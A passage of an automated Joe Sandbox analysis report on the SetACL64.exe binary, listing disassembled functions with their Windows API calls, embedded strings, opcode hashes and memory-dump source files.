                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?\UNC\$\\?
                                                  • API String ID: 0-2035776247
                                                  • Opcode ID: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                                                  • Instruction ID: a6d3f08f65f2a67da4da06dd93c7ec09e81fc999e6a16071a96c04513bcf6d09
                                                  • Opcode Fuzzy Hash: a4f302d2082b19bd39a44b1874956c81c3294110edb74e814a97884128a82e9b
                                                  • Instruction Fuzzy Hash: B241AA62F1866681FF00EF66D0543BDA361EB187B8FC04132EE5D17AC6DEAC91808364
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: CreateFrameInfo__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2558813199-1018135373
                                                  • Opcode ID: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                                                  • Instruction ID: 5222aa39ee3e7628234268a67a774a906819153e87d226d096a53d28da7b0175
                                                  • Opcode Fuzzy Hash: bff377e20215f6bbc56ca34a453ae38d57878f3cd995b74642c36c42e48d33ca
                                                  • Instruction Fuzzy Hash: 3E512676619645C6E760EF26A44026EB7A4FB88BA0F510134EB8D07B56CF7CE460CF51
                                                  APIs
                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C175297E
                                                    • Part of subcall function 00007FF7C1755054: HeapFree.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175506A
                                                    • Part of subcall function 00007FF7C1755054: GetLastError.KERNEL32(?,?,00007FF7C17534C7,00007FF7C1754ADC,?,?,?,00007FF7C1754E5F,?,?,000083BA01AAD97A,00007FF7C1755874,?,?,?,00007FF7C17557A7), ref: 00007FF7C175507C
                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C174226D), ref: 00007FF7C175299C
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe, xrefs: 00007FF7C175298A
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                  • API String ID: 3580290477-3554785221
                                                  • Opcode ID: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                                                  • Instruction ID: a1356fd6ae439a5a3df2b5f9625deb966a43ea792b96cad8ad5e2c382c99f218
                                                  • Opcode Fuzzy Hash: aa599a36ba6a0968a49bd794e7a1571458fa8a1e1b45d82a3122116992cc5e68
                                                  • Instruction Fuzzy Hash: B6416E32A08F52C5EB54FF2798501BCA6A5EB4C7A0F944035EE4E47B86DFBDE8458360
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                                                  • Instruction ID: dfeb8015ee1ab7720ab240b9aca056197ed60d18646a561997388b452ce5ec5a
                                                  • Opcode Fuzzy Hash: d59aa33b38612ae6739f83d51169c656099beb2d3f667978864e56d4317c1a25
                                                  • Instruction Fuzzy Hash: 4441C532B1CA4182EB20EF26E4543A9E7A0FB987A4F944031EE4D87759DFBCE401C750
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _handle_errorf
                                                  • String ID: "$powf
                                                  • API String ID: 2315412904-603753351
                                                  • Opcode ID: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                                                  • Instruction ID: afce8507801c61c4889832d15bb86aee1fcbbf2ae83a8b61a0334076bf1394d8
                                                  • Opcode Fuzzy Hash: 4c8a7104b5368009bc02c85030aff32139670d494d3475396f94041b1bf7d79b
                                                  • Instruction Fuzzy Hash: 89414073D28A80DAD370DF22E4847AAB7A0F79A358F501326F74906999CBBDC5509B50
                                                  APIs
                                                    • Part of subcall function 00007FF7C175DE6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C175DE8E
                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C173E2EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_invalid_parameter_noinfo_noreturn
                                                  • String ID: rt, ccs=UNICODE$wt, ccs=UNICODE
                                                  • API String ID: 1705651295-2937027470
                                                  • Opcode ID: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                                                  • Instruction ID: 7d4dbd86f01139f71333ada71e64ded4db46116d2ed06907f826213f4ea06539
                                                  • Opcode Fuzzy Hash: 935450736d1db829583b36a6614573cb82d4dc60051ad41040f15e431cbeb578
                                                  • Instruction Fuzzy Hash: B131A132A0CA4285EB50EF1AE49422DB360FB8C7A4FD04235E79D43A96DFBCE550C710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: FormatFreeLocalMessage
                                                  • String ID: asio.system error
                                                  • API String ID: 1427518018-3828095645
                                                  • Opcode ID: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                                                  • Instruction ID: aba7e845cc51670b215a6866ac88bbeabb8147c2adcd4ddd3e10072bfc209aa7
                                                  • Opcode Fuzzy Hash: 10628e73ec9175718b0e5b4b763344832475aea0b876288d78f2d80f17bd1f45
                                                  • Instruction Fuzzy Hash: 77214C72608BD182FB249F16A540329BAA6F749BE0F944235DB9903B95CFBCD4A18B50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _handle_error
                                                  • String ID: "$pow
                                                  • API String ID: 1757819995-713443511
                                                  • Opcode ID: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                                                  • Instruction ID: 3a8420ad437e6787615b917bab49964a1649eb53d7bfa173f2f292a7007da3f8
                                                  • Opcode Fuzzy Hash: 1ec19b026a6bd8f63a67ca0b1a3ee6df7a61ad1018684fb431e5833eb4d51299
                                                  • Instruction Fuzzy Hash: 54316B72D18E8486D770DF21E04467AEAA1FBDE354F641326F78906A55CBBDD0819B10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: CloseHandleLocalTime
• String ID: %04d-%02d-%02d %02d-%02d-%02d-%03d
• API String ID: 655981579-2017722003
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: _set_errno_from_matherr
• String ID: exp
• API String ID: 1187470696-113136155
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
• API String ID: 2588686239-3893581201
APIs
• RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7C1741032), ref: 00007FF7C1744C5C
• RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF7C1741032), ref: 00007FF7C1744CA2
Strings
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: AllocErrorLast
• String ID: tss
• API String ID: 4252645092-1638339373
APIs
• try_get_function.LIBVCRUNTIME ref: 00007FF7C1757E85
• TlsSetValue.KERNEL32(?,?,000083BA01AAD97A,00007FF7C175402A,?,?,000083BA01AAD97A,00007FF7C174E201,?,?,?,?,00007FF7C175BCFA,?,?,00000000), ref: 00007FF7C1757E9C
Strings
Memory Dump Source
• Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
• Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315